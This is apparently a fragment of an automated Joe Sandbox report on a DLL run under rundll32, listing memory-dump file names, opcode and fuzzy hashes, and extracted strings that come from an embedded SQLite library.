                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                                                                                                                        • API String ID: 0-3207396689
                                                                                                                                                        • Opcode ID: 3400c222d2f1589d09601d32e5282ad1dca2b0443e562031bc8d258cfde1692b
                                                                                                                                                        • Instruction ID: 41eec6f207d82d3308f5b7df5ef625310841adaf89624980908b3968ca5af07b
                                                                                                                                                        • Opcode Fuzzy Hash: 3400c222d2f1589d09601d32e5282ad1dca2b0443e562031bc8d258cfde1692b
                                                                                                                                                        • Instruction Fuzzy Hash: 6C023763F0C28186EB658A29A060B7E7BA1EB65B84F550335DAFD476D9CF3DE841C700
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                        • Opcode ID: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                        • Instruction ID: 87930ea23ed2d9db5eb0bea09a4d0e22505ceba00716178bdd38911c0224bbda
                                                                                                                                                        • Opcode Fuzzy Hash: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                        • Instruction Fuzzy Hash: F6315332718B8186DB60CF25E8906AE73A0FB88758F544236EEADC7B99DF38C5458700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ?$?$BINARY$Expression tree is too large (maximum depth %d)$auto-index$automatic index on %s(%s)
                                                                                                                                                        • API String ID: 0-2778317500
                                                                                                                                                        • Opcode ID: 5f0726d6b6c6d4b0cec431a75ed50c38a07b61d59302fe92c609fd50e25b4859
                                                                                                                                                        • Instruction ID: 828125e5d4b8c296f06c5ddb9b08874628f5f34bbff29122d84440d37c5f4369
                                                                                                                                                        • Opcode Fuzzy Hash: 5f0726d6b6c6d4b0cec431a75ed50c38a07b61d59302fe92c609fd50e25b4859
                                                                                                                                                        • Instruction Fuzzy Hash: 94C28F73A09B8186DB60CF15D1A0BAD7BA5FB84B88F418635DBAE437A9DF38D451C700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                                                        • API String ID: 0-2646008018
                                                                                                                                                        • Opcode ID: 5c7743b38dd7b8a00cfa0dcd7b4246384b23bc7a3f3c5a429e5630b527c6f95b
                                                                                                                                                        • Instruction ID: a71ee6bb2bdb09c0c86eeec17ef42724a0297271e24548cea7b6ac4f9e382759
                                                                                                                                                        • Opcode Fuzzy Hash: 5c7743b38dd7b8a00cfa0dcd7b4246384b23bc7a3f3c5a429e5630b527c6f95b
                                                                                                                                                        • Instruction Fuzzy Hash: B0B27B22B0964286FB248F6595A1BB827A1BF44F88F844235DE3DDB7D8DF3CE8458340
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                        • API String ID: 0-968123305
                                                                                                                                                        • Opcode ID: f265ee903916efa366c060d96c82a21d87256217d6df19eff7ed7f67b8c91827
                                                                                                                                                        • Instruction ID: 5394be949f16da299a6b2bb3ac1b735d07665f0ab55596e908a26d3fed1d3d75
                                                                                                                                                        • Opcode Fuzzy Hash: f265ee903916efa366c060d96c82a21d87256217d6df19eff7ed7f67b8c91827
                                                                                                                                                        • Instruction Fuzzy Hash: 9AA28A22B09A4285FB148F2598A4BB923A5FB44B88F954636CE7ED77D8DF3CE441C344
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 20c:20e$40f$40f-20a-20d$50f$50f-20a-20d$second
                                                                                                                                                        • API String ID: 0-2094803905
                                                                                                                                                        • Opcode ID: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                        • Instruction ID: aa88c2c1535d54a5ef874290d09c6471f4b44264e3ee053531a960966ac305ea
                                                                                                                                                        • Opcode Fuzzy Hash: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                        • Instruction Fuzzy Hash: 92527C63F286C646E7298F38C470A786795AF95744F148336DA3EA66DCEF38E451C700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                        • API String ID: 0-968123305
                                                                                                                                                        • Opcode ID: ccc4f0fb71982f93144dc1df4263a838bca9b108da3b285266222b113823945a
                                                                                                                                                        • Instruction ID: f440bcc01ea51275b722a20c0161f31407b62a99cebfe1dc5a56f655124bf410
                                                                                                                                                        • Opcode Fuzzy Hash: ccc4f0fb71982f93144dc1df4263a838bca9b108da3b285266222b113823945a
                                                                                                                                                        • Instruction Fuzzy Hash: 38728022F0968685EB649F15D4A0B7A33A5FF44B88F544235CABE977D9EF3CE4418380
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s: table does not support scanning$ASC$DESC$SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %s$bm25$parse error in rank function: %s
                                                                                                                                                        • API String ID: 0-3769240353
                                                                                                                                                        • Opcode ID: 80d49f7cea89dd2fbe3cbe2e981b4fd8477b3981e9e8571f1e66642478195740
                                                                                                                                                        • Instruction ID: 44f4c522a64dde190a45d23489d66fa545cdd6e74c32661b92d33478e7eb6527
                                                                                                                                                        • Opcode Fuzzy Hash: 80d49f7cea89dd2fbe3cbe2e981b4fd8477b3981e9e8571f1e66642478195740
                                                                                                                                                        • Instruction Fuzzy Hash: 12526C63F08A5282EB64CB25A5A0B7923A5FB45B94F184336DE7D976E8DF3CE4518300
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: main$schema$sqlite_$sqlite_master$sqlite_temp_master$temp_schema
                                                                                                                                                        • API String ID: 0-3006123741
                                                                                                                                                        • Opcode ID: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                        • Instruction ID: 3c388326733c2219ac5e192ab7ba6180278764b4232dac103e867713a229f6c1
                                                                                                                                                        • Opcode Fuzzy Hash: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                        • Instruction Fuzzy Hash: BE12F662B0859681FB548B268070E7C3BA2EB51B85F954336EEBEC33D9DE3CD9459700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                        • API String ID: 0-3582982771
                                                                                                                                                        • Opcode ID: ce4018d004635afde5cf612b25440c31076ef44a7df1ed41fa548c0b642c7786
                                                                                                                                                        • Instruction ID: 69fbec8e157ef77be94c5cd7153936eb141785a62b16c371cb680428b43d2a52
                                                                                                                                                        • Opcode Fuzzy Hash: ce4018d004635afde5cf612b25440c31076ef44a7df1ed41fa548c0b642c7786
                                                                                                                                                        • Instruction Fuzzy Hash: 45627723F09A8686EB549B25D4A4B7937A9EF44F98F054635DA7E8B3D8DF3CE4418300
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %d %d %d %d $fts3cursor$illegal first argument to %s$offsets$p
                                                                                                                                                        • API String ID: 0-1954512986
                                                                                                                                                        • Opcode ID: a8a30ad6a33ae40c704fe44932be2cd1a6c4dcd7743fb3ff6a48a0e3bda96bd8
                                                                                                                                                        • Instruction ID: b9f9157d906f96795fcc6c4aa858c09cd6dce618fb42e9e4cf2372035129c0fd
                                                                                                                                                        • Opcode Fuzzy Hash: a8a30ad6a33ae40c704fe44932be2cd1a6c4dcd7743fb3ff6a48a0e3bda96bd8
                                                                                                                                                        • Instruction Fuzzy Hash: F2524A22B18A4686FB148F16E8A0A7973A1FB44B94F550235DE7DD77E8DF3CE8419700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$block$misuse
                                                                                                                                                        • API String ID: 0-2158970013
                                                                                                                                                        • Opcode ID: 59838b5b50c91f9efa08723fce11c1d2068340ed9570e7583e834c9fdc434340
                                                                                                                                                        • Instruction ID: 6d1d049fdb752a954aa7761f579a54ca16dc96811e61d2f6d1777df7c2004c3c
                                                                                                                                                        • Opcode Fuzzy Hash: 59838b5b50c91f9efa08723fce11c1d2068340ed9570e7583e834c9fdc434340
                                                                                                                                                        • Instruction Fuzzy Hash: 3E922822F09A46C6EB649F15E8A4A7967A0FF44B90F554235CB7E877E8DF3CE4428304
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s.%s$%s.rowid$5
                                                                                                                                                        • API String ID: 0-2959728198
                                                                                                                                                        • Opcode ID: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                        • Instruction ID: 194f6cf1dd5fe471dd6646f47f99386881a09806425eab48e7f219c57270cd26
                                                                                                                                                        • Opcode Fuzzy Hash: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                        • Instruction Fuzzy Hash: 7E3372B6B1868186E760CF15D060BBE77A1FB85B84F054235DAAECB799DF39D481CB00
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: BBB$f$sqlite\_%
                                                                                                                                                        • API String ID: 0-4099593418
                                                                                                                                                        • Opcode ID: dbceca1ac09521060875d9155718efddc795ba8691d093c0b06f15726e8dcf01
                                                                                                                                                        • Instruction ID: b052954d70d26c51934bf52d071e6f99a146f1ac9c6220ce50c17b71b06b8883
                                                                                                                                                        • Opcode Fuzzy Hash: dbceca1ac09521060875d9155718efddc795ba8691d093c0b06f15726e8dcf01
                                                                                                                                                        • Instruction Fuzzy Hash: 52B25D73A08A858ADB60DF05E450AAE7BA0F798B84F558235DBED83798DF3DD445CB00
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                        • API String ID: 0-2903559916
                                                                                                                                                        • Opcode ID: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                        • Instruction ID: 56244ae6f03ff83c222e941ae4e878f193ff3daca9523e53691f4680f246d685
                                                                                                                                                        • Opcode Fuzzy Hash: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                        • Instruction Fuzzy Hash: 41729C22B0978695EB598F15A8A0A7967A0FF44B80F594235EE7EC73D8DF7CE841C304
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
